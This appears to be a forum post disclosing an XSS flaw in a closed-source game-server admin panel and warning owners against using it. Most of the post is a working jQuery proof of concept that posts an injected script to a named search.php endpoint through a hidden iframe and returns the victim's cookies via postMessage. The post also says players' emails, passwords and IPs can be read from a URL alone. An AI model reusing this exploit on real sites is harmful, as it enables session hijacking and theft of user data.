Some servers are currently using: Bitte melden Sie sich an, um diesen Link zu sehen.
Bitte melden Sie sich an, um dieses Bild zu sehen.
Then what's that?: Bitte melden Sie sich an, um diesen Link zu sehen.
Bitte melden Sie sich an, um dieses Bild zu sehen.
JavaScript
- window.POST_MESSAGE_TARGET_ORIGIN = '*';
- /**
- *
- * @param {string} url
- * @param {{ [key: string]: string }} body
- */
- function post(url, body) {
- const form = $(document.createElement('form'))
- .attr({
- action: url,
- method: 'POST',
- })
- .append(
- Object.keys(body).map((key) => {
- const value = body[key];
- return $(document.createElement('input')).attr({
- type: 'hidden',
- name: key,
- value,
- });
- })
- );
- const iframe = $(document.createElement('iframe'))
- .css({ display: 'none' })
- .one('load', (event) => {
- $(event.target.contentDocument.documentElement).append(form);
- form.submit();
- });
- $(document.documentElement).append(iframe);
- }
- /**
- *
- * @param {() => void} injection
- */
- function injectMessage(injection) {
- post('https://test.m2admin.net/admin/scripts/js/search.php', {
- text: `<script>exec = eval(\`${injection}\`); window.parent.postMessage(exec(), \`${POST_MESSAGE_TARGET_ORIGIN}\`)</script>`,
- });
- }
- $(window).on('message', (event) => {
- console.log('Received message:');
- console.log(event.originalEvent.data.split(/;\s/).map(cookie => cookie.replace('=', ' = ')).join('\n'));
- });
- injectMessage(() => document.cookie);
Why should ionCube make the connection more secure, lul? 
Btw It's sufficient to know the URL to get the players information like E-Mail, PW, IP etc.. 
You should avoid using this admin panel, because you don't receive the source code when buying it, so you can't fix it and you're not able to verify it (If it is correctly fixed or not). However, i will contact the creator and explain him, that it's better to share his source code when selling it.
